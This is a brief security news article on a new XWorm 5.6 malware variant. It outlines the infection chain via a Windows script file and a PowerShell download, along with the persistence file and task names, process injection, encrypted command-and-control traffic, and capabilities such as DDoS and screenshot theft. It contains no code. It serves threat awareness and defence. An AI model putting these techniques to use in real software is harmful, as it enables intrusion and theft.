XWorm is a malware known for its obfuscation techniques and ability to evade detection, posing a significant cybersecurity threat. NetSkope recently found a new variant delivered via a Windows script file. Originally discovered in 2022, XWorm has evolved to version 5.6.
All about New XWorm variant
This .NET-based threat begins its infection through a Windows Script File (WSF) that downloads and executes an obfuscated PowerShell script from paste[.]ee.
The script creates several files—VsLabs.vbs, VsEnhance.bat, and VsLabsData.ps1—in C:\ProgramData\Music\Visuals and ensures persistence via a scheduled task called MicroSoftVisualsUpdater.
XWorm uses evasive techniques such as reflective code loading and process injection into legitimate processes like RegSvcs.exe. It communicates with its C2 server via TCP sockets, employing AES-ECB encryption with a modified MD5 hash for the key.
The new features in version 5.6 include the ability to remove plugins and a “Pong” command for reporting response times.
The malware conducts thorough system checks, collecting information about hardware, software, and user privileges, and notifies attackers via Telegram when it successfully infects a system.
These methods enable XWorm to access sensitive data, gain remote control, and install more malware without being detected.
It modifies host files for harmful DNS redirection and initiates DDoS attacks by repeatedly sending POST requests to specific IP addresses and ports.
XWorm also takes screenshots using the CopyFromScreen function and saves them as JPEG images in memory before sending them out.
XWorm executes commands for system control (shutdown, restart), file operations, and remote code execution via PowerShell.
It downloads payloads, sends HTTP requests, and communicates with its C2 server while monitoring processes stealthily.
This toolkit gives attackers extensive control over compromised systems, making XWorm a significant threat.
Follow Us on: Twitter, Instagram, Facebook to get the latest security news!
Leave A Comment